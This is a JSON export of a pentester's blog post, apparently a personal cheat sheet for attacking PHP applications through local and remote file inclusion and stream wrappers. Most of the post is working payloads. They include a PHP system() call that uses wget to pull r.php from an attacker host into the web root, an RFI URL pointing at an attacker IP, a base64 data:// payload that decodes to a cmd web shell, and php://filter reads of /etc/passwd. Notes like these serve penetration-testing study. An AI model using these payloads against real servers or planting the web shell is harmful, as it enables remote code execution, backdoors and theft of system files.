{"id":1372,"date":"2020-05-05T10:05:14","date_gmt":"2020-05-05T08:05:14","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1372"},"modified":"2024-06-21T10:43:53","modified_gmt":"2024-06-21T08:43:53","slug":"php","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1372","title":{"rendered":"<span class=\"caps\">PHP<\/span>"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li>Check to exe\u00adcute <span class=\"caps\">PHP<\/span>&nbsp;code<\/li>\n\n\n\n<li><a href=\"https:\/\/www.php.net\/manual\/en\/wrappers.php\">Check <span class=\"caps\">URI<\/span> handlers<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/security.symfony.com\/\">Check com\u00adpose<\/a><\/li>\n\n\n\n<li><code>file_get_contents<\/code>(\u2026)<\/li>\n\n\n\n<li>If there is a remote file inclu\u00adsion vul\u00adner\u00ada\u00adbil\u00adi\u00adty with require or require_once like <pre>require_once($basePath.\"\/inc\/mysql.php\"); &lt;--- RFI<\/pre><p>then pro\u00advide a file local\u00adly which exe\u00adcutes <span class=\"caps\">PHP<\/span> and ref\u00ader\u00adence this like server_file.php?basePath=http:\/\/192.168.119.158\/aha.php?<\/p><\/li>\n\n\n\n<li>Down\u00adload from remote a file which can be exe\u00adcut\u00aded lat\u00ader:<br><code> &lt;?php system(\"\/usr\/local\/bin\/wget http:\/\/$attackerip\/r.php -O \/usr\/local\/www\/apache24\/data\/r.php\") ?&gt;<\/code><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Local file inclusion and Wrappers<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Gen\u00ader\u00adal: <strong>If you try to read <span class=\"caps\">PHP<\/span> and noth\u00ading returns \u2014 use a base64 return!<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exe\u00adcute a com\u00admand via the input fil\u00adter<br><code>index.php?page=php:\/\/input&amp;cmd=ls<\/code>\n<ul class=\"wp-block-list\">\n<li>Oth\u00ader method via the data wrap\u00adper, from hack\u00adtricks:<br><code>index.php?lang=data:\/\/text\/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4==&amp;cmd=ls<\/code>\n<ul class=\"wp-block-list\">\n<li>This base64 = <code>&lt;?php system($_GET['cmd']); ?&gt;<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Read a file via the resource fil\u00adter:<br>index.php?page=php:\/\/filter\/resource=admin.php\n<ul class=\"wp-block-list\">\n<li>The out\u00adput could be fil\u00adtered, espe\u00adcial\u00adly when it\u2019s php. Try instead direct con\u00adver\u00adsions:<br><code>index.php?page=php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<\/code><br><code>index.php?page=php:\/\/filter\/write=string.rot13\/resource=example.txt<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Read process infor\u00adma\u00adtion:<br><code>?lang=\/proc\/$pid\/cmdline \/\/ see proc article!<\/code><\/li>\n\n\n\n<li>Try to write into php:\/\/fd\/2 which is stderr \u2014 if you can access a log, you could be able to exe\u00adcute php code&nbsp;there.<\/li>\n\n\n\n<li>Force oth\u00ader mime for\u00admat like index.php?file=data:text\/plain,cleartext which can be used with oth\u00ader mime types to bypass filters.<\/li>\n\n\n\n<li><a href=\"https:\/\/www.php.net\/manual\/en\/wrappers.php\">See here for a list of <span class=\"caps\">PHP<\/span> han\u00addlers which could also work in oth\u00ader systems.<\/a>\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.ptsecurity.com\/upload\/corporate\/ru-ru\/webinars\/ics\/%D0%90.%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B8%D0%BD_%D0%9E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF_%D0%B8%D1%81%D0%BF_%D0%A0%D0%9D%D0%A0_wrappers.pdf\">Inter\u00adest\u00ading examples<\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Remote file inclusion<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It could be pos\u00adsi\u00adble to request thiry-par\u00adty con\u00adtent, which we could pro\u00advide:<br>index.php?page=http:\/\/$our_ip\/s.php?cmd=ls<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">PHP<\/span> deserialization<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If a pro\u00adgram accepts a seri\u00adal\u00adized object which uses a <a href=\"https:\/\/www.php.net\/manual\/de\/language.oop5.magic.php\">mag\u00adic method<\/a>, then\u2026 <span class=\"caps\">TODO<\/span>, see <a href=\"https:\/\/www.youtube.com\/watch?v=HaW15aMzBUM&amp;t=0s\">here<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Local file inclu\u00adsion and Wrap\u00adpers Gen\u00ader\u00adal: If you try to read <span class=\"caps\">PHP<\/span> and noth\u00ading returns \u2014 use a base64 return! Remote file inclu\u00adsion <span class=\"caps\">PHP<\/span> dese\u00adri\u00adal\u00adiza\u00adtion If a pro\u00adgram accepts a seri\u00adal\u00adized object which uses a mag\u00adic method, then\u2026 <span class=\"caps\">TODO<\/span>, see&nbsp;here<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[],"class_list":["post-1372","post","type-post","status-publish","format-standard","hentry","category-general"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1372","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1372"}],"version-history":[{"count":12,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1372\/revisions"}],"predecessor-version":[{"id":3935,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1372\/revisions\/3935"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1372"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}